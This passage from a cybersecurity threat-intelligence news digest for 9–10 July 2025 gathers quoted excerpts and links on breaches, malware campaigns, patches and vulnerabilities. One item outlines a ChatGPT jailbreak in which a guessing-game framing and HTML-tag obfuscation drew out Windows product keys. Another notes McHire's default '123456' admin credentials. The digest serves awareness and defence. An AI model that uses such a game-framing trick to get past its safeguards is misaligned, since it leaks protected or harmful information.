"Attacks that leverage malicious open-source packages are becoming a major and growing threat. This type of attacks currently seems commonplace, with reports of infected packages in repositories like PyPI or npm appearing almost daily. It would seem that increased scrutiny from researchers on these repositories should have long ago minimized the profits for cybercriminals trying to make a fortune from malicious packages. However, our investigation into a recent cyberincident once again confirmed that open-source packages remain an attractive way for attackers to make easy money."
https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/
- Crypto Wallets Continue To Be Drained In Elaborate Social Media Scam
"Continued research by Darktrace has revealed that cryptocurrency users are being targeted by threat actors in an elaborate social engineering scheme that continues to evolve. In December 2024, Cado Security Labs detailed a campaign targeting Web 3 employees in the Meeten campaign. The campaign included threat actors setting up meeting software companies to trick users into joining meetings and installing the information stealer Realst disguised as video meeting software."
https://www.darktrace.com/blog/crypto-wallets-continue-to-be-drained-in-elaborate-social-media-scam
https://thehackernews.com/2025/07/fake-gaming-and-ai-firms-push-malware.html
- MacOS.ZuRu Resurfaces | Modified Khepri C2 Hides Inside Doctored Termius App
"First noted by a Chinese blogger in July 2021, macOS.ZuRu is a backdoor that was initially delivered through poisoned web results on Baidu. Users searching for the popular Terminal emulator iTerm2 were redirected to a malicious site hosting a trojanized version of the app. Subsequent ZuRu variants used the same model, poisoning Baidu for other popular macOS utilities including SecureCRT, Navicat and Microsoft’s Remote Desktop for Mac. The selection of trojanized apps suggested the malware authors were targeting users of backend tools for SSH and other remote connections utilities."
https://www.sentinelone.com/blog/macos-zuru-resurfaces-modified-khepri-c2-hides-inside-doctored-termius-app/
https://thehackernews.com/2025/07/new-macos-malware-zuru-targeting.html
- Threat Actor Activity Related To The Iran Conflict
"In light of the most recent Iranian conflict, Nozomi Networks Labs has observed a 133% increase in cyberattacks coming from well-known Iranian threat actor groups during May and June. From what Nozomi Networks Labs researchers have observed so far, US companies appear to be the primary target as warned in a June 30th Fact Sheet published by CISA and last week’s National Terrorism Advisory System Bulletin from the U.S. Department of Homeland Security."
https://www.nozominetworks.com/blog/threat-actor-activity-related-to-the-iran-conflict
https://therecord.media/iran-state-backed-hackers-industrial-attacks-spring-2025
Breaches/Hacks/Leaks
- McDonald’s AI Hiring Tool McHire Leaked Data Of 64 Million Job Seekers
"A vulnerability in McHire, the AI-powered recruitment platform used by a vast majority of McDonald’s franchisees, exposed the personal information of over 64 million job applicants. The vulnerability, discovered by security researchers Ian Carroll and Sam Curry, allowed unauthorised access to sensitive data, including names, email addresses, phone numbers, and home addresses. The investigation began after reports surfaced on Reddit about the McHire chatbot, named Olivia and developed by Paradox.ai, giving strange responses. Researchers quickly found two critical weaknesses. First, the administration login for restaurant owners on McHire accepted easily guessable default credentials: “123456” for both username and password. This simple entry granted them administrator access to a test restaurant account within the system."
https://hackread.com/mcdonalds-ai-hiring-tool-mchire-leaked-job-seekers-data/
https://www.malwarebytes.com/blog/news/2025/07/mcdonalds-ai-bot-spills-data-on-job-applicants
General News
- What EU’s PQC Roadmap Means On The Ground
"In this Help Net Security interview, David Warburton, Director at F5 Labs, discusses how the EU’s Post-Quantum Cryptography (PQC) roadmap aligns with global efforts and addresses both the technical and regulatory challenges of migrating to PQC. Warburton also outlines practical steps organizations must take to ensure cryptographic agility and long-term data protection."
https://www.helpnetsecurity.com/2025/07/10/david-warburton-f5-labs-eu-pqc-roadmap/
- Fake Online Stores Look Real, Rank High, And Trap Unsuspecting Buyers
"Shopping on a fake online store can lead to more than a bad purchase. It could mean losing money, having your identity stolen, or even getting malware on your device. E-shop scams rose by 790% in the first quarter of 2025 compared to the same period in 2024, according to Avast. Cybercriminals might be exploiting economic uncertainty as rising tariffs push consumers to seek cheaper deals online. This makes it easier to trick people with fake stores."
https://www.helpnetsecurity.com/2025/07/10/tips-online-shopping-scams/
- Global Software Supply Chain Visibility Remains Critically Low
"Only 23% of organizations are confident that they have very high visibility of their software supply chain, according to LevelBlue’s Data Accelerator. The limited visibility reported by organizations significantly impacts their cyber resilience. This Accelerator is an in-depth analysis into data from the 2025 LevelBlue Futures Report, comparing risk appetites, investment gaps, and overall preparedness to help organizations secure their end-to-end software supplier ecosystem. It shows software supply chain security as a growing business concern in 2025. This is partly due to regional regulatory framework demands, and because the attack surface is expanding in response to AI adoption and the integration of complex third-party ecosystems."
https://www.helpnetsecurity.com/2025/07/10/low-global-software-supply-chain-visibility/
- Russian Pro Basketball Player Arrested For Alleged Role In Ransomware Attacks
"Russian professional basketball player Daniil Kasatkin was arrested in France at the request of the United States for allegedly acting as a negotiator for a ransomware gang. Daniil Kasatkin is a Russian basketball player who briefly played NCAA basketball at Penn State before returning to Russia in 2019. In four seasons with MBA-MAI, he appeared in 172 games before he left the team. According to French media, Kasatkin was arrested at Paris's Charles de Gaulle airport on June 21st after landing in France with his fiancée."
https://www.bleepingcomputer.com/news/security/russian-pro-basketball-player-arrested-for-alleged-role-in-ransomware-attacks/
https://cyberscoop.com/russian-basketball-player-daniil-kasatkin-arrested-france-ransomware-charges-penn-state/
https://therecord.media/russian-basketball-player-arrested-in-france-ransomware
- Retail Cyber Attacks: NCA Arrest Four For Attacks On M&S, Co-Op And Harrods
"Four people have been arrested in the UK as part of a National Crime Agency investigation into cyber attacks targeting M&S, Co-op and Harrods. Two males aged 19, another aged 17, and a 20-year-old female were apprehended in the West Midlands and London this morning (10 July) on suspicion of Computer Misuse Act offences, blackmail, money laundering and participating in the activities of an organised crime group. All four were arrested at their home addresses and had their electronic devices seized for digital forensic analysis."
https://www.nationalcrimeagency.gov.uk/news/retail-cyber-attacks-nca-arrest-four-for-attacks-on-m-s-co-op-and-harrods
https://www.theregister.com/2025/07/10/nca_arrests_four_in_connection/
https://www.bleepingcomputer.com/news/security/four-arrested-in-uk-over-mands-co-op-harrod-cyberattacks/
https://therecord.media/uk-arrests-four-ransomware-ms-harrods-co-op
https://thehackernews.com/2025/07/four-arrested-in-440m-cyber-attack-on.html
https://www.darkreading.com/cyberattacks-data-breaches/4-arrested-uk-marks-spencer-co-op-harrods-hacks
https://www.bankinfosecurity.com/british-police-bust-four-scattered-spider-suspects-in-england-a-28934
https://www.infosecurity-magazine.com/news/four-arrested-uk-retail-attacks/
https://cyberscoop.com/scattered-spider-arrests-uk-nca-marks-and-spencer/
https://hackread.com/uk-arrests-woman-men-cyberattacks-ms-co-op-harrods/
https://www.helpnetsecurity.com/2025/07/10/ms-ransomware-attackers-arrested/
https://www.securityweek.com/four-arrested-in-uk-over-ms-co-op-cyberattacks/
https://securityaffairs.com/179806/cyber-crime/uk-nca-arrested-four-people-over-ms-co-op-cyberattacks.html
- Latin America 2025 Mid-Year Cyber Snapshot Reveals 39% Surge In Attacks As AI Threats Escalate Regional Risk
"Latin America is grappling with an elevated rate of cyber attacks in the first half of 2025. Organizations in the region are being targeted by an average of 2,716 attacks per week, which is 39% higher than the global weekly average of 1,955. New insights from Check Point Research reveal an escalating wave of threats, marked by advanced malware, government-linked operations, and vulnerabilities tied to cloud platforms."
https://blog.checkpoint.com/research/latin-america-2025-mid-year-cyber-snapshot-reveals-39-surge-in-attacks-as-ai-threats-escalate-regional-risk/
- Browser Exploits Wane As Users Become The Attack Surface
"Browser exploits continue to haunt enterprise security. In May, Microsoft patched a browser vulnerability that could allow attackers to force Edge users into Internet Explorer compatibility mode, reducing security protections. A year ago, Google patched three vulnerabilities in its Chrome browser — two that could lead to a sandbox escape and one that could allow code execution."
https://www.darkreading.com/vulnerabilities-threats/browser-exploits-wane-users-become-attack-surface
- Catching Smarter Mice With Even Smarter Cats
"From the beginning, the antivirus world has been a cat-and-mouse game, where malware authors and antivirus engineers constantly adapt their code to bypass or catch each other. Artificial Intelligence is bringing the game to the next level, with malware authors using AI to improve their malware[1] and anti-virus engineers using AI to assist them with reverse engineering[2]."
https://www.fortinet.com/blog/threat-research/catching-smarter-mice-with-even-smarter-cats
- LLMs Fall Short In Vulnerability Discovery And Exploitation
"Large language models (LLMs) are still falling short in performing vulnerability discovery and exploitation tasks. Many threat actors therefore remain skeptical about using AI tools for such roles. This is according to new research by Forescout Research – Vedere Labs, which tested 50 current AI models from commercial, open source and underground sources to evaluate their ability to perform vulnerability research (VR) and exploit development (ED). VR tasks aimed to identify a specific vulnerability in a short code snippet. ED tasks sought to generate a working exploit for a vulnerable binary."
https://www.infosecurity-magazine.com/news/llms-fall-vulnerability-discovery/
- What Can Businesses Do About Ethical Dilemmas Posed By AI?
"Almost every business, whether small or large, now possesses several AI systems that claim to deliver better efficiency, time savings, and quicker decision-making. Through their ability to handle large volumes of data, AI tools minimize trial errors to an absolute minimum, enabling quicker go-to-market. But these transformative benefits are lately being offset by concerns that these intricate, impenetrable machines might be causing more harm to society than benefit to business. Privacy and surveillance, discrimination, and bias top the concern list. Let’s explore the top ethical dilemmas surrounding AI."
https://www.securityweek.com/what-can-businesses-do-about-ethical-dilemmas-posed-by-ai/
- SOC Threat Radar — July 2025
"Over the last month, Barracuda Managed XDR’s security solutions, threat intelligence and SOC analysts identified developments that organizations should be aware of, including:
- A 35% rise in infostealer detections
- A 56% rise in threats targeting Linux servers
- A 13% rise in suspicious logins for AWS consoles"
https://blog.barracuda.com/2025/07/10/soc-threat-radar-july-2025
- At Last, a Use Case For AI Agents With Sky-High ROI: Stealing Crypto
"Using AI models to generate exploits for cryptocurrency contract flaws appears to be a promising business model, though not necessarily a legal one. Researchers with University College London (UCL) and the University of Sydney (USYD) in Australia have devised an AI agent that can autonomously discover and exploit vulnerabilities in so-called smart contracts. Smart contracts, which have never lived up to their name, are self-executing programs on various blockchains that carry out decentralized finance (DeFi) transactions when certain conditions are met."
https://www.theregister.com/2025/07/10/ai_agents_automatically_steal_cryptocurrency/
https://arxiv.org/abs/2507.05558
References
Electronic Transactions Development Agency (ETDA)
- CISA Releases Thirteen Industrial Control Systems Advisories
-
Cyber Threat Intelligence 10 July 2025
Financial Sector
- June 2025 Security Issues In Korean & Global Financial Sector
"This report comprehensively covers actual cyber threats and security issues related to financial companies in South Korea and abroad. This article includes an analysis of malware and phishing cases distributed to the financial sector, the top 10 malware strains targeting the financial sector, and the industry statistics of leaked Korean accounts on Telegram. A detailed look into the phishing email distribution case targeting the financial sector is also covered."
https://asec.ahnlab.com/en/88936/
Industrial Sector
- ICS Patch Tuesday: Vulnerabilities Addressed By Siemens, Schneider, Phoenix Contact
"July 2025 Patch Tuesday ICS security advisories have been published by Siemens, Schneider Electric and Phoenix Contact. Siemens has released nine new advisories, as well as a security bulletin urging customers to take steps to secure their industrial control systems (ICS) amid an increasing threat to the operational technology (OT) landscape. The alert cites the current geopolitical situation and references a recent US government alert warning organizations about a potential surge in attacks by Iran. The industrial giant also informed customers that its Sentron Powermanager and Desigo CC devices are not affected by a recently disclosed remote code execution vulnerability in Apache Tomcat."
https://www.securityweek.com/ics-patch-tuesday-vulnerabilities-addressed-by-siemens-schneider-phoenix-contact-2/
- Key Findings From The Fortinet 2025 Operational Technology Security Report
"The IT/OT air gap is largely gone. Once isolated OT systems are now deeply interconnected with enterprise IT environments. And as these industrial systems continue to modernize, they have become increasingly vulnerable to threat actors. That reality has put OT cybersecurity squarely on the radar of executives, regulators, and adversaries alike. Fortinet’s 2025 State of Operational Technology and Cybersecurity Report provides a detailed examination of how organizations are addressing the increasing risks faced by today’s OT networks. Based on a global survey of more than 550 OT professionals across manufacturing, energy, transportation, and other critical sectors, the report captures the current state of OT security, including the progress made, the pressure OT teams still face, and the priorities shaping the future of OT environments. This seventh installment of the report includes four years of trending data to identify emerging trends in OT cybersecurity."
https://www.fortinet.com/blog/business-and-technology/key-findings-from-the-fortinet-2025-operational-technology-security-report
New Tooling
- Kanvas: Open-Source Incident Response Case Management Tool
"Kanvas is an open-source incident response case management tool with a simple desktop interface, built in Python. It gives investigators a place to work with SOD (Spreadsheet of Doom) or similar files, so they can handle key tasks without jumping between different programs. “At its core, the tool leverages Excel as the backend. It includes a note-taking feature that uses Markdown, allowing investigators to write structured, portable notes. These notes can be easily exported or shared in .md format, ensuring that documentation remains accessible even without the tool,” Jinto Antony, the author of the tool and Senior Investigator, Incident Response at WithSecure, told Help Net Security."
https://www.helpnetsecurity.com/2025/07/09/kanvas-open-source-incident-response-case-management-tool/
https://github.com/WithSecureLabs/Kanvas
Vulnerabilities
- Critical RCE Vulnerability In Mcp-Remote: CVE-2025-6514 Threatens LLM Clients
"The JFrog Security Research team has recently discovered and disclosed CVE-2025-6514 – a critical (CVSS 9.6) security vulnerability in the mcp-remote project – a popular tool used by Model Context Protocol clients. The vulnerability allows attackers to trigger arbitrary OS command execution on the machine running mcp-remote when it initiates a connection to an untrusted MCP server, posing a significant risk to users – a full system compromise. mcp-remote is a proxy that enables Large Language Model (LLM) hosts such as Claude Desktop to communicate with remote MCP servers, even if natively they only support communicating with local MCP servers."
https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/
https://www.bankinfosecurity.com/serious-flaws-patched-in-model-context-protocol-tools-a-28924
- Ivanti, Fortinet, Splunk Release Security Updates
"Ivanti, Fortinet, and Splunk on Tuesday announced patches for dozens of vulnerabilities across their product portfolios, including critical- and high-severity flaws. Security updates released for Ivanti Connect Secure (ICS) and Policy Secure (IPS), Endpoint Manager Mobile (EPMM), and Endpoint Manager (EPM) resolve a total of 11 bugs that require authentication to be exploited. The EPM update resolves three high-severity defects that could allow attackers to decrypt other users’ passwords or read arbitrary data from the database, while the EPMM refresh fixes two high-severity OS command injection flaws leading to remote code execution."
https://www.securityweek.com/ivanti-fortinet-splunk-release-security-updates/
- Ruckus Virtual SmartZone (vSZ) And Ruckus Network Director (RND) Contain Multiple Vulnerabilities
"Multiple vulnerabilities have been identified in Ruckus Wireless management products, specifically Virtual SmartZone (vSZ) and Network Director (RND), including authentication bypass, hardcoded secrets, arbitrary file read by authenticated users, and unauthenticated remote code execution. These issues may allow full compromise of the environments managed by the affected software. At this time, we have not been able to reach Ruckus Wireless or their parent company to include their response to these disclosed vulnerabilities; we recommend using these products only within isolated management networks accessible to trusted users."
https://kb.cert.org/vuls/id/613753
https://www.bleepingcomputer.com/news/security/ruckus-networks-leaves-severe-flaws-unpatched-in-management-devices/
https://www.securityweek.com/unpatched-ruckus-vulnerabilities-allow-wireless-environment-hacking/
- Count(er) Strike – Data Inference Vulnerability In ServiceNow
"Varonis Threat Labs discovered a high-severity vulnerability in ServiceNow’s platform that could lead to significant data exposure and exfiltration, including PII, credentials, and other sensitive information. ServiceNow is a widely used platform with 85% of its customer base being in the Fortune 500. Our researchers were able to exploit the record count UI element on list pages, using enumeration techniques and query filters to infer and expose sensitive data from various tables within ServiceNow."
https://www.varonis.com/blog/counter-strike-servicenow
https://www.bleepingcomputer.com/news/security/new-servicenow-flaw-lets-attackers-enumerate-restricted-data/
- An NVIDIA Container Bug & Chance To Harden Kubernetes
"A once-dangerous NVIDIA Container Toolkit vulnerability showcases how to harden Kubernetes clusters against container escape. On Aug. 6 at Black Hat USA in Las Vegas, researchers from Wiz will host the session "Breaking Out of The AI Cage: Pwning AI Providers with NVIDIA Vulnerabilities." The talk expands on research the vendor published last September dedicated to CVE-2024-0132, a NVIDIA Container Toolkit time-of-check to time-of-use (TOCTOU) vulnerability that would have enabled container escapes for AI and cloud providers that use the popular open source component."
https://www.darkreading.com/cloud-security/nvidia-container-bug-harden-kubernetes
- AMD Warns Of New Meltdown, Spectre-Like Bugs Affecting CPUs
"AMD is warning users of a newly discovered form of side-channel attack affecting a broad range of its chips that could lead to information disclosure. Akin to Meltdown and Spectre, the Transient Scheduler Attack (TSA) comprises four vulnerabilities that AMD said it discovered while looking into a Microsoft report about microarchitectural leaks. The four bugs do not appear too venomous at face value – two have medium-severity ratings while the other two are rated "low." However, the low-level nature of the exploit's impact has nonetheless led Trend Micro and CrowdStrike to assess the threat as "critical.""
https://www.theregister.com/2025/07/09/amd_tsa_side_channel/
https://www.amd.com/en/resources/product-security/bulletin/amd-sb-7029.html
Malware
- June 2025 Malware Spotlight: Discord Exploits Lead To Rising Threats
"Cyber criminals continue to innovate, with a recent innovation involving the hijacking of expired Discord vanity invite links to silently deliver malicious payloads. This new campaign, discovered by Check Point Research, delivers AsyncRAT, now ranked number 3 among Top Malware for June. Using trusted platforms such as GitHub, Bitbucket, and Discord for payload delivery and data exfiltration, the attackers have devised an advanced multi-stage malware delivery system, including ClickFix phishing tactics and ChromeKatz to bypass encryption mechanisms. These developments underscore the ever-evolving nature of cyber threats, with SafePay remaining a top ransomware threat and the education sector continuing to face significant risks."
https://blog.checkpoint.com/research/june-2025-malware-spotlight-discord-exploits-lead-to-rising-threats/
- New AI Malware PoC Reliably Evades Microsoft Defender
"A soon-to-be-released security evasion tool will help red teamers and hackers consistently bypass Microsoft Defender for Endpoint. Since November 2023, doomsayers have foretold of a future where large language models (LLMs) would help hackers develop malware more quickly, at scale, with capabilities beyond what humans could probably design on their own. That future hasn't quite materialized yet; hackers thus far have used artificial intelligence (AI) to generate simple malware and phishing content, and to aid in supplementary tasks like target research."
https://www.darkreading.com/endpoint-security/ai-malware-poc-evades-microsoft-defender
- From Click To Compromise: Unveiling The Sophisticated Attack Of DoNot APT Group On Southern European Government Entities
"The DoNot APT group, also identified by various security vendors as APT-C-35, Mint Tempest, Origami Elephant, SECTOR02, and Viceroy Tiger, has been active since at least 2016, and has been attributed by several vendors to have links to India. The global cybersecurity landscape is continually challenged by state-sponsored threat actors conducting espionage operations. The DoNot APT group (also known as APT-C-35), is believed to operate with a focus on South Asian geopolitical interests. This threat group typically targets government entities, foreign ministries, defense organizations, and NGOs especially those in South Asia and Europe."
https://www.trellix.com/blogs/research/from-click-to-compromise-unveiling-the-sophisticated-attack-of-donot-apt-group-on-southern-european-government-entities/
https://thehackernews.com/2025/07/donot-apt-expands-operations-targets.html
https://securityaffairs.com/179774/apt/donot-apt-is-expanding-scope-targeting-european-foreign-ministries.html
- Fake CNN And BBC Sites Used To Push Investment Scams
"Cybercriminals are faking popular news websites such as CNN, BBC and CNBC to trick people into investing in fraudulent cryptocurrency schemes, according to a new report. Researchers at Bahrain-based cybersecurity firm CTM360 said they identified more than 17,000 such sites, which publish fake stories featuring prominent public figures, including national leaders and central bank governors. The articles falsely linked those figures to “fabricated investment schemes in order to build trust and get engagement from victims,” the researchers said."
https://therecord.media/news-websites-faked-to-spread-investment-scams
Breaches/Hacks/Leaks
- Qantas Confirms Data Breach Impacts 5.7 Million Customers
"Australian airline Qantas has confirmed that 5.7 million people have been impacted by a recent data breach, in which threat actors stole customers' data. On July 1st, Qantas disclosed that it had detected a cyberattack the previous day on a third-party platform used by a Qantas airline contact centre. While the company did not share any further details, BleepingComputer learned that the attack shared similarities with other attacks on the aviation industry linked to threat actors classified as Scattered Spider."
https://www.bleepingcomputer.com/news/security/qantas-confirms-data-breach-impacts-57-million-customers/
https://www.theregister.com/2025/07/09/qantas_begins_telling_customers_data/
- Bitcoin Depot Breach Exposes Data Of Nearly 27,000 Crypto Users
"Bitcoin Depot, an operator of Bitcoin ATMs, is notifying customers of a data breach incident that has exposed their sensitive information. In the letter sent to affected individuals, the company informs that it first detected suspicious activity on its network last year on June 23. Although the internal investigation was completed on July 18, 2024, a parallel investigation by federal agencies dictated that public disclosure of the incident should be withheld until it was completed."
https://www.bleepingcomputer.com/news/security/bitcoin-depot-breach-exposes-data-of-nearly-27-000-crypto-users/
https://therecord.media/bitcoin-depot-cryptocurrency-atm-company-data-breach
- PII, ID Numbers, & SSNs Exposed In Tax Credit Consultancy Data Breach
"Cybersecurity researcher Jeremiah Fowler discovered and reported to vpnMentor an unencrypted and non-password-protected database that contained 245,949 records. The database, which presumably belonged to a tax credit consulting agency, held PII, driver’s licenses, military discharge forms, documents containing Social Security numbers (SSNs), and other internal, potentially sensitive information."
https://www.vpnmentor.com/news/report-rockerbox-breach/
https://hackread.com/rockerbox-server-tax-firm-exposed-sensitive-records/
- More Than $40 Million Stolen From GMX Crypto Platform
"Decentralized exchange GMX said more than $40 million worth of cryptocurrency was stolen during an incident on Wednesday morning. GMX, which allows users to purchase and speculate on many different cryptocurrencies, published a statement on social media saying the company “experienced an exploit” and is conducting an investigation on how it occurred. GMX added that its platform had previously undergone “numerous audits from top security specialists.” Several blockchain security companies confirmed the theft, tracking about $43 million in user funds exiting the platform. Trading on the platform has been disabled."
https://therecord.media/gmx-exchange-cryptocurrency-stolen
- Nippon Steel Subsidiary Blames Data Breach On Zero-Day Attack
"Japan-based Nippon Steel Solutions on Tuesday disclosed a data breach that resulted from the exploitation of a zero-day vulnerability. Nippon Steel Solutions, also called NS Solutions, offers cloud, cybersecurity and other IT solutions. The company is a subsidiary of Japanese steel giant Nippon Steel, which recently acquired US Steel in a controversial deal. Nippon Steel Solutions said in a statement posted on its Japanese-language website that it detected suspicious activity on some servers on March 7."
https://www.securityweek.com/nippon-steel-subsidiary-blames-data-breach-on-zero-day-attack/
https://securityaffairs.com/179766/data-breach/nippon-steel-solutions-data-breach.html
General News
- June 2025 Trend Report On The Deep Web & Dark Web
"The June 2025 trend report on the Deep Web & Dark Web is composed of the following topics: Ransomware, Data Breach, DarkWeb, CyberAttack, and Threat Actor. Please note that some of the information in the report may not be verifiable."
https://asec.ahnlab.com/en/88933/
- Why Your Security Team Feels Stuck
"Cybersecurity friction usually gets framed as a user problem: password policies that frustrate employees, MFA that slows down logins, or blocked apps that send workers into the arms of shadow IT. But there’s a different kind of friction happening behind the scenes, and it’s hitting security teams themselves. It shows up during incident response, threat hunting, and day-to-day tasks. It’s the drag of too many tools, rigid approval chains, and a lack of clarity about who owns what. The irony is hard to ignore. In the name of securing the organization, security teams can end up slowed down by their own systems."
https://www.helpnetsecurity.com/2025/07/09/why-cybersecurity-friction/
- Know Your Enemy: Understanding Dark Market Dynamics
"In popular culture, content providers portray the Dark Web as a sinister, unorganized Internet forum run by shadowy figures in hoodies. By all accounts, it is a hub of illegal activity. Reports show that 56.8% of content found on the Dark Web is illegal, 20% of global drug sales occur on Dark Web markets, and 60% of Dark Web marketplaces focus on cybercrime-related activities."
https://www.darkreading.com/vulnerabilities-threats/understanding-dark-market-dynamics
- ChatGPT Guessing Game Leads To Users Extracting Free Windows OS Keys & More
"In a recent submission last year, researchers discovered a method to bypass AI guardrails designed to prevent sharing of sensitive or harmful information. The technique leverages the game mechanics of language models, such as GPT-4o and GPT-4o-mini, by framing the interaction as a harmless guessing game. By cleverly obscuring details using HTML tags and positioning the request as part of the game’s conclusion, the AI inadvertently returned valid Windows product keys. This case underscores the challenges of reinforcing AI models against sophisticated social engineering and manipulation tactics."
https://0din.ai/blog/chatgpt-guessing-game-leads-to-users-extracting-free-windows-os-keys-more
https://www.theregister.com/2025/07/09/chatgpt_jailbreak_windows_keys/
References
Electronic Transactions Development Agency (ETDA)
- June 2025 Security Issues In Korean & Global Financial Sector
-
Cyber Threat Intelligence 09 July 2025
Industrial Sector
- Emerson ValveLink Products
"Successful exploitation of these vulnerabilities could allow an attacker with access to the system to read sensitive information stored in cleartext, tamper with parameters, and run unauthorized code."
https://www.cisa.gov/news-events/ics-advisories/icsa-25-189-01
Vulnerabilities
- Adobe Patches Critical Code Execution Bugs
"Adobe on Tuesday announced the rollout of security fixes for 58 vulnerabilities across 13 products, including three critical-severity flaws in Adobe Connect, ColdFusion, and Experience Manager Forms (AEM Forms) on JEE. The most severe of these bugs is CVE-2025-49533 (CVSS score of 9.8), a deserialization of untrusted data in AEM Forms on JEE that could lead to arbitrary code execution. Although it says it is not aware of any exploits in the wild targeting the security defect, Adobe marked the patch as priority 1, urging users to update to AEM Forms on JEE version 6.5.0.0.20250527.0."
https://www.securityweek.com/adobe-patches-critical-code-execution-bugs/
- SAP Patches Critical Flaws That Could Allow Remote Code Execution, Full System Takeover
"Enterprise software maker SAP on Tuesday announced the release of 27 new and four updated security notes as part of its July 2025 Security Patch Day, including six that address critical vulnerabilities. At the top of the list is an update for a note released in May, which addresses five security defects in its Supplier Relationship Management (SRM). SAP initially marked the note as high-priority, based on the severity score of the most important of these bugs. Now, it has updated the rating to ‘critical’, upon learning that the impact of one of these issues is much higher than initially determined."
https://www.securityweek.com/sap-patches-critical-flaws-that-could-allow-remote-code-execution-full-system-takeover/
- Microsoft July 2025 Patch Tuesday Fixes One Zero-Day, 137 Flaws
"Today is Microsoft's July 2025 Patch Tuesday, which includes security updates for 137 flaws, including one publicly disclosed zero-day vulnerability in Microsoft SQL Server. This Patch Tuesday also fixes fourteen "Critical" vulnerabilities, ten of which are remote code execution vulnerabilities, one is an information disclosure, and two are AMD side channel attack flaws."
https://www.bleepingcomputer.com/news/microsoft/microsoft-july-2025-patch-tuesday-fixes-one-zero-day-137-flaws/
https://www.darkreading.com/application-security/microsoft-patches-137-cves-no-zero-days
https://blog.talosintelligence.com/microsoft-patch-tuesday-july-2025/
https://cyberscoop.com/microsoft-patch-tuesday-july-2025/
https://www.securityweek.com/microsoft-patches-130-vulnerabilities-for-july-2025-patch-tuesday/
https://securityaffairs.com/179738/security/microsoft-patch-tuesday-security-updates-for-july-2025-fixed-a-zero-day.html
https://www.theregister.com/2025/07/08/microsoft_patch_tuesday/
Malware
- New Android TapTrap Attack Fools Users With Invisible UI Trick
"A novel tapjacking technique can exploit user interface animations to bypass Android's permission system and allow access to sensitive data or trick users into performing destructive actions, such as wiping the device. Unlike traditional, overlay-based tapjacking, TapTrap attacks work even with zero-permission apps to launch a harmless transparent activity on top of a malicious one, a behavior that remains unmitigated in Android 15 and 16. TapTrap was developed by a team of security researchers at TU Wien and the University of Bayreuth (Philipp Beer, Marco Squarcina, Sebastian Roth, Martina Lindorfer), and will be presented next month at the USENIX Security Symposium."
https://www.bleepingcomputer.com/news/security/new-android-taptrap-attack-fools-users-with-invisible-ui-trick/
https://taptrap.click/usenix25_taptrap_paper.pdf
- Anatsa Targets North America; Uses Proven Mobile Campaign Process
"ThreatFabric researchers have identified a new campaign involving the Anatsa Android banking trojan, which is now targeting users in North America. This marks at least the third instance of Anatsa focusing its operations on mobile banking customers in the United States and Canada. As with previous campaigns, Anatsa is being distributed via the official Google Play Store."
https://www.threatfabric.com/blogs/anatsa-targets-north-america-uses-proven-mobile-campaign-process
https://thehackernews.com/2025/07/anatsa-android-banking-trojan-hits.html
https://www.bleepingcomputer.com/news/security/android-malware-anatsa-infiltrates-google-play-to-target-us-banks/
https://therecord.media/anatsa-android-banking-malware-returns-north-america
- How a Hybrid Mesh Architecture Disrupts The Attack Chain (Part Two)
"In Part 1 we covered the basics and how a fragmented approach can have a higher MTTD and MTTR. In part two we highlight five critical ways a hybrid mesh approach uniquely disrupts the ransomware lifecycle."
https://blog.checkpoint.com/security/how-a-hybrid-mesh-architecture-disrupts-the-attack-chain-part-two/
- CoinMiner Attacks Exploiting GeoServer Vulnerability
"AhnLab SEcurity intelligence Center (ASEC) has confirmed that the unpatched GeoServer is still under continuous attack. Threat actors are scanning for vulnerable GeoServer and installing CoinMiner. ASEC has also identified cases of infection in South Korea."
https://asec.ahnlab.com/en/88917/
- Phishing Attack: Deploying Malware On Indian Defense BOSS Linux
"CYFIRMA has identified a sophisticated cyber-espionage campaign orchestrated by APT36 (also known as Transparent Tribe), a threat actor based in Pakistan. This campaign specifically targets personnel within the Indian defense sector. In a notable shift from previous methodologies, APT36 has adapted its tactics to focus on Linux-based environments, with a particular emphasis on systems running BOSS Linux, a distribution extensively utilized by Indian government agencies."
https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/
https://hackread.com/pakistan-transparent-tribe-indian-defence-linux-malware/
- Approach To Mainframe Penetration Testing On z/OS. Deep Dive Into RACF
"In our previous article we dissected penetration testing techniques for IBM z/OS mainframes protected by the Resource Access Control Facility (RACF) security package. In this second part of our research, we delve deeper into RACF by examining its decision-making logic, database structure, and the interactions between the various entities in this subsystem. To facilitate offline analysis of the RACF database, we have developed our own utility, racfudit, which we will use to perform possible checks and evaluate RACF configuration security. As part of this research, we also outline the relationships between RACF entities (users, resources, and data sets) to identify potential privilege escalation paths for z/OS users."
https://securelist.com/zos-mainframe-pentesting-resource-access-control-facility/116873/
- Malicious Pull Request Infects VS Code Extension
"In the last few months, ReversingLabs (RL) researchers have encountered multiple malicious packages that target cryptocurrency users and developers. In May, RL researcher Karlo Zanki wrote a blog about malicious PyPI packages that targets developers in the Solana ecosystem. Another RL researcher, Lucija Valentić, wrote about malicious npm packages that steal crypto funds from wallets by injecting code into local, legitimate packages. Those are notable incidents."
https://www.reversinglabs.com/blog/malicious-pull-request-infects-vscode-extension
https://thehackernews.com/2025/07/malicious-pull-request-infects-6000.html
- BaitTrap: Over 17,000 Fake News Websites Caught Fueling Investment Fraud Globally
"A newly released report by cybersecurity firm CTM360 reveals a large-scale scam operation utilizing fake news websites—known as Baiting News Sites (BNS)—to deceive users into online investment fraud across 50 countries. These BNS pages are made to look like real news outlets: CNN, BBC, CNBC, or regional media. They publish fake stories that feature public figures, central banks, or financial brands, all claiming to back new ways to earn passive income. The goal? Build trust quickly and steer readers toward professional-looking scam platforms like Trap10, Solara Vynex, or Eclipse Earn."
https://thehackernews.com/2025/07/baittrap-over-17000-fake-news-websites.html
https://www.ctm360.com/reports/baittrap-rise-of-baiting-news-sites
- GoldMelody’s Hidden Chords: Initial Access Broker In-Memory IIS Modules Revealed
"Unit 42 researchers uncovered a campaign by an initial access broker (IAB) to exploit leaked Machine Keys — cryptographic keys used on ASP.NET sites — to gain access to targeted organizations. IABs breach organizations and then sell that access to other threat actors. This report analyzes the tools used in these attacks. We track this actor as the temporary group TGR-CRI-0045. The group seems to follow an opportunistic approach but has attacked organizations in Europe and the U.S. in the following industries: financial services, manufacturing, wholesale and retail, high technology, and transportation and logistics."
https://unit42.paloaltonetworks.com/initial-access-broker-exploits-leaked-machine-keys/
Breaches/Hacks/Leaks
- M&S Confirms Social Engineering Led To Massive Ransomware Attack
